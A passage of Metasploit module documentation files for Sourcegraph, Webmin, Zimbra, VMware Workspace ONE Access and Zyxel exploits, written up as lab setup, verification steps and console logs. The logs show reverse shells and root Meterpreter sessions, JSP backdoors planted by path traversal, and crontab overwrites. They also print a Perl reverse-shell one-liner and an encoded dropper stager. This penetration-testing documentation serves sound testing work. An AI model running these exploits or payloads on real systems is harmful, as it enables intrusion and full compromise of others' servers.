+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > check
+[+] 192.168.159.128:3178 - The target is vulnerable. Successfully set core.sshCommand.
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully set core.sshCommand.
+[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
+[*] Executing Unix Command target
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:59116) at 2022-07-08 17:23:15 -0400
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:59124) at 2022-07-08 17:23:15 -0400
+
+meterpreter > 
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : caab8e904df4
+OS              : Linux 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+This module exploits an arbitrary command injection in Webmin versions prior to
+1.997.
+
+Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
+updates and installation. Due to a lack of input sanitization, it is possible to
+inject an arbitrary command that will be concatenated to the package manager call.
+
+This exploit requires authentication and the account must have access to the
+Software Package Updates module.
+
+## Installation
+
+### Ubuntu
+- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
+- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
+```
+apt-get install libauthen-pam-perl libio-pty-perl
+dpkg -i ./webmin_1.996_all.deb
+```
+
+## Setup
+- Go to `https://<target IP>:10000/`
+- Login as `root` with the OS password
+- Create a new user:
+  `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
+- Setup permissions
+  `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`
+
+## Verification Steps
+1. Install and setup the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/webmin_package_updates_rce`
+1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
+1. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+Set this to the Webmin base path. The default is `/`.
+
+### USERNAME
+
+The account username to use.
+
+### PASSWORD
+
+The account password.
+
+## Scenarios
+
+### Webmin 1.996 on Ubuntu 18.04
+- Target 0 (`Unix In-Memory`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+cat /etc/issue
+Ubuntu 18.04.6 LTS \n \l
+```
+
+- Target 1 (`Linux Dropper`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 192.168.0.23
+[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.0.23
+OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability
+in the following versions of Zimbra Collaboration Suite:
+
+* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
+* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
+
+Note that the open source edition is not affected.
+
+Successful exploitation results in RCE as the `zimbra` user.
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12,
+which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page,
+after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
+
+To set the server up:
+1. `wget https://files.zimbra.com/downloads/8.8.12_GA/zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz` on a Ubuntu 18.04 VM.
+1. `tar -xvf zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz`
+1. `hostnamectl set-hostname <hostname of your choice>` to set the hostname for the VM.
+1. Edit the `/etc/hosts` file and add in a line `127.0.0.1 <hostname of your choice>`
+1. `cd zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002 && sudo ./setup.sh`
+1. Answer `Y` to every question.
+1. You will need to wait a while whilst some stuff is set up. You should then get to a menu.
+1. Use the number keys to select the menu options.
+1. Configure the rest of the options such as the admin password, and full path to license file.
+1. Once everything is configured you should get a prompt to press `a` to save and install. Press `a` when this appears.
+1. You will then be prompted to save the configuration. Accept this and respond `Y` to any further prompts.
+1. Server should start installing. Once its finished you should be ready to test.
+
+Once the server is up, it's vulnerable.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700
+```
+
+There's no easy way that I see to check for the patch (and the only vulnerable version I have is
+quite a bit older), so attempts to exploit patched versions will likely result in a warning message
+that the target may not vulnerable:
+
+```
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+## Verification Steps
+1. `use exploit/linux/http/zimbra_mboximport_cve_2022_27925`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell as the `zimbra` user.
+
+## Options
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially
+because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TARGET_USERNAME`
+
+The username included in the `mboximport` request - any valid username works, `admin` is usually fine.
+
+## Scenarios
+
+### Zimbra Collaboration Suite Network Edition 8.8.12 Patch 6 on Ubuntu 18.04
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options
+
+Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
+
+   Name             Current Setting                                                                   Required  Description
+   ----             ---------------                                                                   --------  -----------
+   Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            7071                                                                              yes       The target port (TCP)
+   SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
+   TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
+   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
+   TARGET_USERNAME  admin                                                                             yes       The target user, must be valid on the Zimbra server
+   VHOST                                                                                              no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.0.0.146       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Zimbra Collaboration Suite
+
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/nkxj.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:48640) at 2022-08-22 11:08:19 -0700
+
+meterpreter > getuid
+Server username: zimbra
+
+meterpreter > shell
+Process 121849 created.
+Channel 1 created.
+/opt/zimbra/bin/zmcontrol -v
+Release 8.8.12.GA.3794.UBUNTU18.64 UBUNTU18_64 NETWORK edition, Patch 8.8.12_P6.
+```
+
+### Zimbra Collaboration Suite Network Edition 8.8.15 Patch 33 on Ubuntu 18.04
+
+Note: This version is not vulnerable, because the issue is patched
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.167
+RHOSTS => 10.0.0.167
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+### Zimbra Collaboration Suite Open Source Edition Patch 8.8.12 Patch 6 on Ubuntu 18.04
+
+Note: This version is not vulnerable, the open source edition doesn't have the correct path.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
+[*] Sending POST request with ZIP file
+[-] Exploit aborted due to failure: not-found: The target path was not found, target is probably not vulnerable
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,92 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier) on Zimbra. You can get the vulnerable version of `unrar` here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+Zimbra is the specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra, assuming the vulnerable version of `unrar` is installed, are affected:
+
+* Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+* Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra from the current version:
+
+```
+# apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
+# reboot
+```
+
+And to verify:
+
+```
+$ sudo -u zimbra /opt/zimbra/bin/zmcontrol -v
+Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.
+```
+
+Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.
+
+## Verification Steps
+
+To exploit Zimbra, first load the module and generate the .rar file:
+
+```
+msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[...] waiting [...]
+```
+
+Then, email that file to any user (including a non-existent mailbox) on the Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract it to check for malware with no user interaction. Metasploit should see the malicious file extracted and get a session:
+
+```
+[...]
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:39710) at 2022-07-27 13:18:03 -0700
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate - defaults to `payload.rar`, but can be changed on the filesystem or whatever.
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TRIGGER_PAYLOAD`
+
+A boolean, default `true`, that determines whether we use HTTP requests to trigger the .jsp payload. Set to `false` to trigger the payload manually.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path.
@@ -0,0 +1,117 @@
+## Vulnerable Application
+VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of
+the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control
+is permitted via the sudo configuration without a password.
+
+### Setup
+
+To exploit this vulnerability in conjunction with CVE-2022-22954, follow [Installing and Configuring VMware Workspace
+ONE Access] or simply import the OVA into a **VMware hypervisor**. The target should be vulnerable to both
+vulnerabilities out of the box.
+
+The HW-150533, HW-154129, and HW-156875 patches may be optionally applied. In this case, a session will need to be
+opened by some means to the appliance as the `horizon` user in order to be exploitable. This is most easily accomplished
+by [resetting the root password], logging in locally, and then configuring SSH. Patches can be obtained from [VMware's
+Website]. Steps to reset the `root` password are available [here].
+
+[Installing and Configuring VMware Workspace ONE Access]: https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08/workspace_one_access_install/GUID-0FABD001-050B-4A54-B100-2FA4E8F55613.html
+[VMware's Website]: https://customerconnect.vmware.com/en/downloads/details?downloadGroup=WS1A_ONPREM_210801&productId=1192&rPId=79985
+[resetting the root password]: https://kb.vmware.com/s/article/76530
+
+## Verification Steps
+
+1. Setup a vulnerable VMware instance (see the steps above).
+2. Start msfconsole.
+3. Obtain a session on the vulnerable instance.
+    * It is recommend to use either `exploit/linux/http/vmware_workspace_one_access_cve_2022_22954` if the target is
+      vulnerable to it or, alternatively, `exploit/multi/ssh/sshexec`.
+4. Do: `set SESSION -1`
+5. Optionally set the PAYLOAD and related options.
+6. Do: `run`
+7. If the target is vulnerable, the payload should be executed.
+
+## Options
+
+## Scenarios
+
+### VMware Workspace ONE Access 21.08.0.1
+In the following scenario, initial access is gained by first exploiting CVE-2022-22954. Once the session is opened, it
+is elevated to root by exploiting CVE-2022-31660.
+
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 
+
+Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.98   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.98
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400
+
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: horizon
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
+SESSION => -1
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Backing up the original file...
+[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (40132 bytes) to 192.168.250.237
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
+[*] Restoring file contents...
+[*] Restoring file permissions...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,198 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
+allows a low privileged user (e.g. `nobody`) escalate to root. The issue stems from
+a suid binary that allows all users to copy files as `root`. This module overwrites
+the firewall's crontab to execute an attacker provided script, resulting in code
+execution as `root`.
+
+In order to use this module, the attacker must first establish shell access. For
+example, by exploiting CVE-2022-30525.
+
+Known affected Zyxel models are:
+
+* USG FLEX 50, 50W, 100W, 200, 500, 700
+* ATP 100, 200, 500, 700, 800
+* VPN 50, 100, 300, 1000
+* USG20-VPN and USG20W-VPN
+
+### Setup
+
+The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+cannot be emulated. As such, testing requires a physical device. Once the
+device has been acquired, you'll need to accomplish the following:
+
+* Once powered on, register the device with Zyxel. You cannot do anything
+with the device until this is accomplished. Fortunately, the web interface
+will force you to complete this process. You'll need to create an account at
+https://portal.myzyxel.com and the firewall will need internet connectivity
+to complete the process.
+
+* Once the device is up to date, you'll need to downgrade the firmware. From
+portal.myzyxel.com you can download old firmware from:
+
+Devices Management -> Firmware Download
+
+From there you can select model and version to download. The last vulnerable
+version from the affected systems is 5.21 Patch 1.
+
+* Once you are using the vulnerable version, there is no special configuration
+you need to exploit from the LAN. If you want to exploit from the WAN, you'll
+need to enable "HTTP" and/or "HTTPS" through the firewall. From the web interface
+do:
+
+Configuration -> Objects -> Service -> Service Group -> Default_Allow_WAN_To_ZyWALL
+
+And move "HTTP" and/or "HTTPS" from the left column to the right. After applying
+the firewall should pass HTTP/HTTPS through the firewall to the web interface.
+
+* That's it. You are good to go.
+
+## Verification Steps
+
+* Follow setup steps above.
+* Establish a shell on the device. See `exploit/linux/http/zyxel_ztp_rce`
+* Do: `use exploit/linux/local/zyxel_suid_cp_lpe`
+* Do: `check`
+* Verify the remote host is exploitable
+* Do: `set LHOST <ip>`
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+## Scenarios
+
+### Successful escalation to root bash shell on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[+] Deleted /tmp/bJUQqm
+[*] Resetting crontab to the original version
+[+] Deleted /tmp/IcNlzvnv5
+[*] Command shell session 2 opened (10.0.0.28:4444 -> 10.0.0.14:50829) at 2022-05-13 11:57:08 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
+
+### Successful escalation to root Meterpreter on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
